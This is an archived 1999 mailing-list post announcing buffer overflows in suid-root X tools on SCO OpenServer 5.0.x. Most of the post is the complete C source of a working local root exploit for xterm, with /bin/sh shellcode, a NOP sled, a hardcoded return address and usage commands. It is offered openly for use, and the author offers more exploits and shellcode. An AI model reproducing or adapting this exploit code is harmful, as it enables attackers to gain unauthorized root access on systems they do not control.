Hi: This is not new, but i cant find exploits for it. Almost all the tools that come with the XBase package of the SCO OpenServer 5.0.x are vulnerable to buffer overflow problems. Some of these tools are suid root, like scoterm, xterm and xload, and are very easy to exploit. In newer versions, SCO have patched some holes but not all. Here is a example of a exploit for one of these vulnerabilities. ------------------------------------------------- /* * <xtermx.c> Local root exploit * * Offset: xterm (SCO OpenServer 5.0.4) * 0 -> From an open scoterm (without display parameter) * 2000 -> From remote telnet (with display parameter) * * Usage: * $ cc xtermx.c -o xtermx * $ scoterm * $ /usr/bin/X11/xterm -bg `xtermx` * or * $ /usr/bin/X11/xterm -display 1.1.1.1:0 -bg `xtermx 2000` * * Note: xterm need to be run from a valid x-display * * By: The Dark Raver of CPNE (Murcia/Spain - 22/6/99) * * <http://members.tripod.com/~ochodedos> - <dobleat_private> * */ #include <stdlib.h> #include <stdio.h> char hell[]= "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; /* char hell[]= "\xeb\x1b" // start: jmp uno "\x5e" // dos: popl %esi "\x31\xdb" // xorl %ebx,%ebx "\x89\x5e\x07" // movb %bl,0x7(%esi) "\x89\x5e\x0c" // movl %ebx,0x0c(%esi) "\x88\x5e\x11" // movb %bl,0x11(%esi) "\x31\xc0" // xorl %eax,%eax "\xb0\x3b" // movb $0x3b,%al "\x8d\x7e\x07" // leal 0x07(%esi),%edi "\x89\xf9" // movl %edi,%ecx "\x53" // pushl %ebx "\x51" // pushl %ecx "\x56" // pushl %esi "\x56" // pushl %esi "\xeb\x10" // jmp execve "\xe8\xe0\xff\xff\xff" // uno: call dos "/bin/sh" "\xaa\xaa\xaa\xaa" "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 */ #define OFF 0x80471ff // SCO OpenServer 5.0.4 #define ALINEA 0 #define LEN 2000 int main(int argc, char *argv[]) { int offset=0; char buf[LEN]; int i; if(argc < 2) { printf("Usage: xtermx [offset]\n"); } else { offset=atoi(argv[1]); } memset(buf,0x90,LEN); memcpy(buf+1000,hell,strlen(hell)); for(i=1100+ALINEA;i<LEN-4;i+=4) *(int *)&buf[i]=OFF+offset; for(i=0;i<LEN;i++) putchar(buf[i]); exit(0); } ------------------------------------------------- If you want more exploits, shellcodes, or security help for SCO, my e-mail is: dobleat_private The Dark Raver
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:50:15 PDT